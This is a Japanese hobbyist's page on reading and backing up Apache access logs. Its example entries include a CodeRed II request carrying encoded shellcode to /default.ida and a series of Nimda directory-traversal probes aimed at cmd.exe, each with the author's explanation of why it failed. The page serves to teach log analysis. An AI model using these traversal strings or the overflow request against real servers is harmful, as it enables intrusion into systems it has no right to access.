|
1.Apacheのログ
Apacheのインストールディレクトリィの下の log2 ディレクトリィの中に access.log というログと error.log というログがあります。(その他にインストール情報を記録した install.log もあります。)
access.log はHTTPプロトコルでのサーバーへの要求のget/post情報を1行1行記録し、error.log はエラー時の情報を記録するログです。
ログは元々航海日誌のことを指していた言葉で、サーバの中でも似たような役割を果たしています。サーバの日々の健康カルテとも言えます。
パケットフィルタリングの情報はルータに任せることにして、access.log を見ることにより、不正の要求がどのIPアドレスから来たかがすぐに分かります。
|
2.参照と保存
Apacheのスタートプログラムの中の「Review Access Log」をクリックすると、.logに関連付けられたメモ帳が開いて参照できますが、これは直接エクスプローラからログファイルをクリックするのと同じです。
Apacheを再インストールする場合はログファイルは残しておいてくれるので、最初からバックアップしておく必要はありませんが、
容量が大きいのでサイクル時を決めて保存し、クリアしておく方がいいと思います。今必要でなくても後々になって解析したいという時が来ると思います。
コピー中は排他制御が働きますから、適当な空きエリアに素早くログファイルをコピーした後、日付で多少の整理整頓の編集をしてからCD-R等にバックアップをします。
|
3.ログの確認
今の自分にはセキュリティ解析の知識は皆無なので、あまり解析は出来ませんが、2点だけ何時も気になるログが出力されるので挙げておきます。
現在というか今までウィルスチェッカーなどのソフトはインストールしたことがないので、「これがウィルスに侵されているということだ!」と言われるかもしれませんが、
別に何も支障はないのでそのままにしています。
|
 |
| |
219.103.220.245 - - [31/May/2003:23:19:42 +0900] "GET / HTTP/1.1" 200 5666
219.103.220.245 - - [31/May/2003:23:19:43 +0900] "GET /StartFumichan.swf HTTP/1.1" 200 33509
219.103.220.245 - - [31/May/2003:23:19:44 +0900] "GET /StartProg.swf HTTP/1.1" 200 3360
219.103.220.245 - - [31/May/2003:23:19:44 +0900] "GET /StartSundai.swf HTTP/1.1" 200 3411
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /cgi-bin/count/counter.cgi HTTP/1.1" 200 1211
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /StartDoll.swf HTTP/1.1" 200 3048
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /StartWebDesign.swf HTTP/1.1" 200 2938
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /StartHome.swf HTTP/1.1" 200 3471
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /cgi-bin/count/counter.cgi?cnt=2 HTTP/1.1" 200 859
219.103.220.245 - - [31/May/2003:23:19:46 +0900] "GET /fumichan.swf HTTP/1.1" 200 1058
219.103.220.245 - - [31/May/2003:23:19:47 +0900] "GET /images/download_flash.gif HTTP/1.1" 200 1795
219.103.220.245 - - [31/May/2003:23:19:52 +0900] "GET /Wanko.swf HTTP/1.1" 200 11731
|
|
| 正常なやり取りのログ内容 (access.log) |
|
219.103.220.245 :サーバにアクセスして来たユーザのIPアドレス
[31/May/2003:23:19:42 +0900] :アクセスした日時
"GET / HTTP/1.1" :HTTPプロトコルのGET/POSTリクエスト
200 :HTTPプロトコルのステータスコード。主なコード内容は
200-299はリクエスト成功。
400-499はクライアント側のエラー(404でNot Found)
500-599はサーバ側のエラー(501はプログラムでエラー)
5666 :アクセスしたデータのバイト数
|
|
| |
61.139.150.10 - - [31/May/2003:22:44:03 +0900] "GET /default.ida?XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b
%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 10
|
|
| CodeRed2 ウィルスの残骸?の1行 (access.log) |
|
"GET / HTTP/1.1" :常に固定で default.ida に長い引数を付けてアクセス
200 :通常は404でNot Found なので何もアクセスしない。この場合は
10 :ルートに default.ida の名前のダミーファイルを置いている。(内容は"馬鹿野郎"のテキストファイル(10バイト))
|
|
| |
61.82.81.23 - - [30/May/2003:10:30:11 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 298
61.82.81.23 - - [30/May/2003:10:30:12 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 296
61.82.81.23 - - [30/May/2003:10:30:12 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
61.82.81.23 - - [30/May/2003:10:30:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
61.82.81.23 - - [30/May/2003:10:30:14 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.82.81.23 - - [30/May/2003:10:30:18 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
61.82.81.23 - - [30/May/2003:10:30:22 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
61.82.81.23 - - [30/May/2003:10:30:26 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 353
61.82.81.23 - - [30/May/2003:10:30:30 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
61.82.81.23 - - [30/May/2003:10:30:30 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
61.82.81.23 - - [30/May/2003:10:30:31 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
61.82.81.23 - - [30/May/2003:10:30:32 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
61.82.81.23 - - [30/May/2003:10:30:32 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310
61.82.81.23 - - [30/May/2003:10:30:32 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310
61.82.81.23 - - [30/May/2003:10:30:33 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.82.81.23 - - [30/May/2003:10:30:33 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
|
|
| Nimda ウィルスの残骸?の複数行 (access.log) |
|
"GET / HTTP/1.1" :WindowsのIISのファイルを利用して、ディレクトリィ内容を見たがっているが、Apache なので関係なし
404 :Not Found
|
| |
|
共にエラーで終わっているから問題ないと思う。ポートスキャンなんてやってきて当たり前のことだから、
これらのアクセスがウィルスであろうとなかろうと、何も影響がなければ心配することはない?(強気にはまだなれない^^);
ログは規則正しく並んでいるので、統計を取るのは簡単に出来ると思いますが、排除することの方が先だね。
誰か排除する方法を知りませんか?
|
|
Top